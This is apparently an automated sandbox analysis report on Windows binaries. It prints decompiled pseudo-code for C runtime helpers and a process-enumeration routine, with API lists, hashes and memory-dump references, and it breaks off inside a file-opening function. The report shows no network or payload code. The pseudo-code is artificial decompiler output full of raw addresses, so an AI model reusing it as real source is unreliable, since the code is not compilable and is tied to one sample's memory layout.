                                                                                                                                                                    • API String ID: 3541540748-813478822
                                                                                                                                                                    • Opcode ID: dd71c00dc3e889e3b8e1fcdb10f070c2db9be79ce23929b4c0d2ec3d363c14be
                                                                                                                                                                    • Instruction ID: 908e89cf5b9352ff889f1a9c3fa8eeef98413c65ec874cc1b061f0950b8e6722
                                                                                                                                                                    • Opcode Fuzzy Hash: dd71c00dc3e889e3b8e1fcdb10f070c2db9be79ce23929b4c0d2ec3d363c14be
                                                                                                                                                                    • Instruction Fuzzy Hash: 6F214FB5C0021CABDB28DB54DD82BD9B774EB04754F4041D4B609A7285EB74BB84CFD2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001815A(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				char _v20;
                                                                                                                                                                    				char _t43;
                                                                                                                                                                    				char _t46;
                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                    				intOrPtr _t57;
                                                                                                                                                                    				int _t58;
                                                                                                                                                                    				signed short* _t59;
                                                                                                                                                                    				short* _t60;
                                                                                                                                                                    				int _t65;
                                                                                                                                                                    				char* _t72;
                                                                                                                                                                    
                                                                                                                                                                    				_t72 = _a8;
                                                                                                                                                                    				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                                    					L5:
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					if( *_t72 != 0) {
                                                                                                                                                                    						E1000D4F5( &_v20, __edi, _a16);
                                                                                                                                                                    						_t43 = _v20;
                                                                                                                                                                    						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                    						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                    							_t46 = E10013A1A( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                                    							__eflags = _t46;
                                                                                                                                                                    							if(_t46 == 0) {
                                                                                                                                                                    								__eflags = _a4;
                                                                                                                                                                    								_t40 = _v20 + 4; // 0x840ffff8
                                                                                                                                                                    								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                    									L10:
                                                                                                                                                                    									__eflags = _v8;
                                                                                                                                                                    									if(_v8 != 0) {
                                                                                                                                                                    										_t53 = _v12;
                                                                                                                                                                    										_t11 = _t53 + 0x70;
                                                                                                                                                                    										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                    										__eflags =  *_t11;
                                                                                                                                                                    									}
                                                                                                                                                                    									return 1;
                                                                                                                                                                    								}
                                                                                                                                                                    								L21:
                                                                                                                                                                    								_t54 = E1000F720(__eflags);
                                                                                                                                                                    								 *_t54 = 0x2a;
                                                                                                                                                                    								__eflags = _v8;
                                                                                                                                                                    								if(_v8 != 0) {
                                                                                                                                                                    									_t54 = _v12;
                                                                                                                                                                    									_t33 = _t54 + 0x70;
                                                                                                                                                                    									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                    									__eflags =  *_t33;
                                                                                                                                                                    								}
                                                                                                                                                                    								return _t54 | 0xffffffff;
                                                                                                                                                                    							}
                                                                                                                                                                    							_t56 = _v20;
                                                                                                                                                                    							_t15 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                    							_t65 =  *_t15;
                                                                                                                                                                    							__eflags = _t65 - 1;
                                                                                                                                                                    							if(_t65 <= 1) {
                                                                                                                                                                    								L17:
                                                                                                                                                                    								_t24 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                    								__eflags = _a12 -  *_t24;
                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                    									goto L21;
                                                                                                                                                                    								}
                                                                                                                                                                    								__eflags = _t72[1];
                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                    									goto L21;
                                                                                                                                                                    								}
                                                                                                                                                                    								L19:
                                                                                                                                                                    								__eflags = _v8;
                                                                                                                                                                    								_t27 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                    								_t57 =  *_t27;
                                                                                                                                                                    								if(_v8 == 0) {
                                                                                                                                                                    									return _t57;
                                                                                                                                                                    								}
                                                                                                                                                                    								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                    								return _t57;
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _a12 - _t65;
                                                                                                                                                                    							if(_a12 < _t65) {
                                                                                                                                                                    								goto L17;
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _a4;
                                                                                                                                                                    							_t21 = _t56 + 4; // 0x840ffff8
                                                                                                                                                                    							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                    							_t56 = _v20;
                                                                                                                                                                    							if(_t58 != 0) {
                                                                                                                                                                    								goto L19;
                                                                                                                                                                    							}
                                                                                                                                                                    							goto L17;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t59 = _a4;
                                                                                                                                                                    						__eflags = _t59;
                                                                                                                                                                    						if(_t59 != 0) {
                                                                                                                                                                    							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L10;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t60 = _a4;
                                                                                                                                                                    						if(_t60 != 0) {
                                                                                                                                                                    							 *_t60 = 0;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L5;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    			}


















                                                                                                                                                                    APIs
                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1001818A
                                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 100181BE
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 100181EF
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 1001825D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                                    • Opcode ID: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
                                                                                                                                                                    • Instruction ID: 8c2b7c8d3196bbd4c2d7993dcbbe5c0e1781117acee873ad45468beb87eff19f
                                                                                                                                                                    • Opcode Fuzzy Hash: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
                                                                                                                                                                    • Instruction Fuzzy Hash: 37318D32A04296FFEB11CFA4CC819AE7BE9FF02251F1585A9E4509F1A1D730DB81DB51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001A370(void* __ebx, void* __edi, void* __esi, char* _a4) {
                                                                                                                                                                    				int _v8;
                                                                                                                                                                    				int _v12;
                                                                                                                                                                    				short* _v16;
                                                                                                                                                                    
                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                    				_v12 = E1000CAC0(_a4);
                                                                                                                                                                    				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);
                                                                                                                                                                    				_t9 = _v8 + 2; // 0x2
                                                                                                                                                                    				_v16 = L1000CE56(__ebx, _a4, __edi, __esi, _v8 + _t9);
                                                                                                                                                                    				_t13 = _v8 + 2; // 0x2
                                                                                                                                                                    				E1000CF20(__edi, _v16, 0, _v8 + _t13);
                                                                                                                                                                    				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
                                                                                                                                                                    				_v16[_v8] = 0;
                                                                                                                                                                    				return _v16;
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • _strlen.LIBCMT ref: 1001A381
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A39C
                                                                                                                                                                    • _memset.LIBCMT ref: 1001A3C6
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3E2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$_memset_strlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 745779501-0
                                                                                                                                                                    • Opcode ID: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
                                                                                                                                                                    • Instruction ID: c5e182b0f3cbb216502a88be2155e7732263ea6a521cd02f1448982d76bc71fb
                                                                                                                                                                    • Opcode Fuzzy Hash: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
                                                                                                                                                                    • Instruction Fuzzy Hash: 5311B1B9E00208FBEB14CF94D895F9EB7B5EB48704F108198F9099B385D671AA018B95
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                    			E1001F570() {
                                                                                                                                                                    				struct _FILETIME _v12;
                                                                                                                                                                    				struct _SYSTEMTIME _v28;
                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                    				struct _SYSTEMTIME _v52;
                                                                                                                                                                    				struct _FILETIME _v60;
                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                    
                                                                                                                                                                    				_v28.wYear = 0x7b2;
                                                                                                                                                                    				_v28.wMonth = 1;
                                                                                                                                                                    				_v28.wDay = 1;
                                                                                                                                                                    				_v28.wHour = 0;
                                                                                                                                                                    				_v28.wMinute = 0;
                                                                                                                                                                    				_v28.wSecond = 0;
                                                                                                                                                                    				_v28.wMilliseconds = 0;
                                                                                                                                                                    				GetSystemTime( &_v52);
                                                                                                                                                                    				SystemTimeToFileTime( &_v52,  &_v12);
                                                                                                                                                                    				SystemTimeToFileTime( &_v28,  &_v60);
                                                                                                                                                                    				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
                                                                                                                                                                    				asm("sbb eax, [ebp-0x34]");
                                                                                                                                                                    				_v36 = E1000F290(_t31, _v12.dwHighDateTime, 0x2710, 0);
                                                                                                                                                                    				_v32 = _t31;
                                                                                                                                                                    				return _v36;
                                                                                                                                                                    			}











                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 1001F5A4
                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F5B2
                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F5C0
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 1001F5DB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$System$File$__aulldiv
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3735792614-0
                                                                                                                                                                    • Opcode ID: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
                                                                                                                                                                    • Instruction ID: fa02b7a9fed9572687d28a8f87146f07c02dbb090ec293c5d85fe2b1344f7672
                                                                                                                                                                    • Opcode Fuzzy Hash: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
                                                                                                                                                                    • Instruction Fuzzy Hash: 9301E575D1021DAADB00DFE4C8899EEB7B8FF04304F109649E904A7250E779A64ACBA9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                    			E100026D0(void* __eflags) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				char _v56;
                                                                                                                                                                    				char _v84;
                                                                                                                                                                    				void* _t14;
                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                    
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(E10022D98);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				 *[fs:0x0] = _t20;
                                                                                                                                                                    				E10001160( &_v84, __eflags, "vector<T> too long");
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				E10001E70( &_v56,  &_v84);
                                                                                                                                                                    				E1000EBEB( &_v56, 0x103307a8);
                                                                                                                                                                    				_v8 = 0xffffffff;
                                                                                                                                                                    				_t14 = E100011A0( &_v84);
                                                                                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                                                                                    				return _t14;
                                                                                                                                                                    			}










                                                                                                                                                                    APIs
                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMTD ref: 10002706
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 10002714
                                                                                                                                                                      • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330750,103332E0), ref: 1000EC2B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                    • API String ID: 1843230569-3788999226
                                                                                                                                                                    • Opcode ID: d6cada7001f69a800286162e9fcab198a3ba3934b13d850f72d45b17b4c01992
                                                                                                                                                                    • Instruction ID: 1a2e96a28b8215f22a0e790cb2dc9ca4275ca3d727c061adff09d24352fe5d00
                                                                                                                                                                    • Opcode Fuzzy Hash: d6cada7001f69a800286162e9fcab198a3ba3934b13d850f72d45b17b4c01992
                                                                                                                                                                    • Instruction Fuzzy Hash: 31F05876804548EBDB14DBD4DD81BEEB778FB047A0F900728F522676C4DB342A05CB80
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                    			E1000442C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                    				intOrPtr* _t20;
                                                                                                                                                                    				intOrPtr* _t23;
                                                                                                                                                                    				void* _t25;
                                                                                                                                                                    				void* _t26;
                                                                                                                                                                    				void* _t27;
                                                                                                                                                                    
                                                                                                                                                                    				_t27 = __eflags;
                                                                                                                                                                    				_push(0x44);
                                                                                                                                                                    				E1000F00B(E10022968, __ebx, __edi, __esi);
                                                                                                                                                                    				E10001160(_t25 - 0x28, _t27, "invalid string position");
                                                                                                                                                                    				_t2 = _t25 - 4;
                                                                                                                                                                    				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                                    				_t20 = _t25 - 0x50;
                                                                                                                                                                    				E10001D90(_t20,  *_t2, _t25 - 0x28);
                                                                                                                                                                    				 *((intOrPtr*)(_t25 - 0x50)) = 0x100232c8;
                                                                                                                                                                    				E1000EBEB(_t25 - 0x50, 0x10330158);
                                                                                                                                                                    				asm("int3");
                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                    				_t23 = _t20;
                                                                                                                                                                    				E10001EF0(_t20,  *((intOrPtr*)(_t26 + 8)));
                                                                                                                                                                    				 *_t23 = 0x100232c8;
                                                                                                                                                                    				return _t23;
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10004433
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 10004465
                                                                                                                                                                      • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330750,103332E0), ref: 1000EC2B
                                                                                                                                                                      • Part of subcall function 10001EF0: std::exception::exception.LIBCMT ref: 10001F13
                                                                                                                                                                    Strings
                                                                                                                                                                    • invalid string position, xrefs: 10004438
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
                                                                                                                                                                    • String ID: invalid string position
                                                                                                                                                                    • API String ID: 2977319401-1799206989
                                                                                                                                                                    • Opcode ID: 8c5585535794f9a1e6dadcd63e0675b21dc6b9f2d0e27e7cb116dd0b948fe66e
                                                                                                                                                                    • Instruction ID: a56476a32a0c337bfade56aca9773eeef8d3bbd0f37adf4676240551fddf05bf
                                                                                                                                                                    • Opcode Fuzzy Hash: 8c5585535794f9a1e6dadcd63e0675b21dc6b9f2d0e27e7cb116dd0b948fe66e
                                                                                                                                                                    • Instruction Fuzzy Hash: 6CE09275800198EBD710DBD4EC41ADEB778EF04390F80881AF605BB20ACBB5A948CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                    			E0040CE93(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                    				void* _v8;
                                                                                                                                                                    				void* _v12;
                                                                                                                                                                    				char _v16;
                                                                                                                                                                    				char _v24;
                                                                                                                                                                    				char _v32;
                                                                                                                                                                    				char _v40;
                                                                                                                                                                    				char _v48;
                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                    				char _v576;
                                                                                                                                                                    				long _v580;
                                                                                                                                                                    				void _v1102;
                                                                                                                                                                    				void* _v1104;
                                                                                                                                                                    				intOrPtr _v1636;
                                                                                                                                                                    				long _v1652;
                                                                                                                                                                    				void _v1656;
                                                                                                                                                                    				void* _v1660;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t42;
                                                                                                                                                                    				int _t47;
                                                                                                                                                                    				long _t50;
                                                                                                                                                                    				void* _t51;
                                                                                                                                                                    				void* _t57;
                                                                                                                                                                    				struct HINSTANCE__* _t69;
                                                                                                                                                                    				void* _t71;
                                                                                                                                                                    				void* _t72;
                                                                                                                                                                    				intOrPtr _t79;
                                                                                                                                                                    				void* _t84;
                                                                                                                                                                    				void* _t85;
                                                                                                                                                                    				void* _t86;
                                                                                                                                                                    
                                                                                                                                                                    				_t79 = _a4;
                                                                                                                                                                    				_t2 = _t79 + 0x2c; // 0x40c800
                                                                                                                                                                    				E00403F55(_t2);
                                                                                                                                                                    				_t42 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                    				_v12 = _t42;
                                                                                                                                                                    				memset( &_v1656, 0, 0x228);
                                                                                                                                                                    				_t85 = _t84 + 0xc;
                                                                                                                                                                    				_v1660 = 0x22c;
                                                                                                                                                                    				Process32FirstW(_v12,  &_v1660); // executed
                                                                                                                                                                    				while(1) {
                                                                                                                                                                    					_t47 = Process32NextW(_v12,  &_v1660); // executed
                                                                                                                                                                    					if(_t47 == 0) {
                                                                                                                                                                    						break;
                                                                                                                                                                    					}
                                                                                                                                                                    					E0040C997( &_v580);
                                                                                                                                                                    					_t50 = _v1652;
                                                                                                                                                                    					_v580 = _t50;
                                                                                                                                                                    					_v52 = _v1636;
                                                                                                                                                                    					_t51 = OpenProcess(0x410, 0, _t50);
                                                                                                                                                                    					__eflags = _t51;
                                                                                                                                                                    					_v8 = _t51;
                                                                                                                                                                    					if(_t51 != 0) {
                                                                                                                                                                    						L4:
                                                                                                                                                                    						_v1104 = 0;
                                                                                                                                                                    						memset( &_v1102, 0, 0x208);
                                                                                                                                                                    						_t86 = _t85 + 0xc;
                                                                                                                                                                    						E0040D049(_t79, _v8,  &_v1104);
                                                                                                                                                                    						__eflags = _v1104;
                                                                                                                                                                    						if(_v1104 == 0) {
                                                                                                                                                                    							L6:
                                                                                                                                                                    							__eflags =  *0x4136ec; // 0x1
                                                                                                                                                                    							_v16 = 0x104;
                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                    								_t69 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                    								__eflags = _t69;
                                                                                                                                                                    								if(_t69 != 0) {
                                                                                                                                                                    									 *0x4136ec = 1;
                                                                                                                                                                    									 *0x4136f0 = GetProcAddress(_t69, "QueryFullProcessImageNameW");
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    							_t57 =  *0x4136f0;
                                                                                                                                                                    							__eflags = _t57;
                                                                                                                                                                    							if(_t57 != 0) {
                                                                                                                                                                    								 *_t57(_v8, 0,  &_v1104,  &_v16); // executed
                                                                                                                                                                    							}
                                                                                                                                                                    							L11:
                                                                                                                                                                    							E0040CAF2( &_v576,  &_v1104);
                                                                                                                                                                    							E0040CE3D(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                                                                                                                    							_t85 = _t86 + 0x14;
                                                                                                                                                                    							CloseHandle(_v8);
                                                                                                                                                                    							_t79 = _a4;
                                                                                                                                                                    							L12:
                                                                                                                                                                    							_t37 = _t79 + 0x2c; // 0x40c800
                                                                                                                                                                    							E0040D0D3(_t37,  &_v580);
                                                                                                                                                                    							continue;
                                                                                                                                                                    						}
                                                                                                                                                                    						__eflags = _v1104 - 0x3f;
                                                                                                                                                                    						if(_v1104 != 0x3f) {
                                                                                                                                                                    							goto L11;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L6;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t71 = E004058FB();
                                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t71 + 4)) - 5;
                                                                                                                                                                    					if( *((intOrPtr*)(_t71 + 4)) <= 5) {
                                                                                                                                                                    						goto L12;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t72 = OpenProcess(0x1000, 0, _v580);
                                                                                                                                                                    					__eflags = _t72;
                                                                                                                                                                    					_v8 = _t72;
                                                                                                                                                                    					if(_t72 == 0) {
                                                                                                                                                                    						goto L12;
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L4;
                                                                                                                                                                    				}
                                                                                                                                                                    				return CloseHandle(_v12);
                                                                                                                                                                    			}


                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040CEAF
                                                                                                                                                                    • memset.MSVCRT ref: 0040CEC4
                                                                                                                                                                    • Process32FirstW.KERNEL32(0040C7D4,?), ref: 0040CEE0
                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 0040CF17
                                                                                                                                                                    • OpenProcess.KERNEL32(00001000,00000000,?), ref: 0040CF3B
                                                                                                                                                                    • memset.MSVCRT ref: 0040CF5C
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 0040CF9C
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0040CFB6
                                                                                                                                                                    • QueryFullProcessImageNameW.KERNELBASE(?,00000000,?,00000104,?,?), ref: 0040CFD9
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 0040D00A
                                                                                                                                                                    • Process32NextW.KERNEL32(0040C7D4,0000022C), ref: 0040D02C
                                                                                                                                                                    • CloseHandle.KERNEL32(0040C7D4,0040C7D4,0000022C,?,?,?,?,?,?), ref: 0040D03C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                                                                    • String ID: ?$QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                    • API String ID: 239888749-1549906504
                                                                                                                                                                    • Opcode ID: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
                                                                                                                                                                    • Instruction ID: b0c56ac076400066d7f85ee915419da0325970425bfee0af64f00aa3922c561f
                                                                                                                                                                    • Opcode Fuzzy Hash: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
                                                                                                                                                                    • Instruction Fuzzy Hash: E2413DB1D00119EEDF20DFA1DC85ADEB7B9EB04308F0041BAE609B2191D7755F998F99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 91%
E0040C6FB(void*** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, long* _a12, signed int* _a16) {
	void* _v8;
	void* _v12;
	void* _v16;
	int _v20;
	int _v24;
	int _v28;
	int _v32;
	char _v36;
	intOrPtr _v40;
	int _v44;
	intOrPtr _v48;
	int _v52;
	char _v56;
	int _v60;
	intOrPtr _v64;
	int _v68;
	char _v72;
	int _v76;
	int _v80;
	int _v84;
	int _v88;
	int _v92;
	int _v96;
	int _v100;
	void _v622;
	short _v624;
	char _v1616;
	void _v1623;
	char _v1624;
	void* __esi;
	void* _t97;
	void* _t99;
	long _t101;
	intOrPtr _t102;
	void* _t110;
	void* _t111;
	void* _t114;
	void* _t116;
	void* _t128;
	void* _t131;
	signed char* _t152;
	void* _t153;
	void** _t154;
	void*** _t155;
	intOrPtr _t158;
	signed short* _t159;
	void* _t163;
	void* _t164;
	void* _t165;

	_t165 = __eflags;
	_t155 = __eax;
	_v28 = 0;
	_v32 = 0;
	_v624 = 0;
	memset( &_v622, 0, 0x208);
	E00405800( &_v624);
	_t164 = _t163 + 0x10;
	_t97 = CreateFileW( &_v624, 0x80000000, 3, 0, 3, 0, 0); // executed; 0x80000000 = GENERIC_READ, share mode 3 = FILE_SHARE_READ | FILE_SHARE_WRITE, disposition 3 = OPEN_EXISTING
	_v12 = _t97;
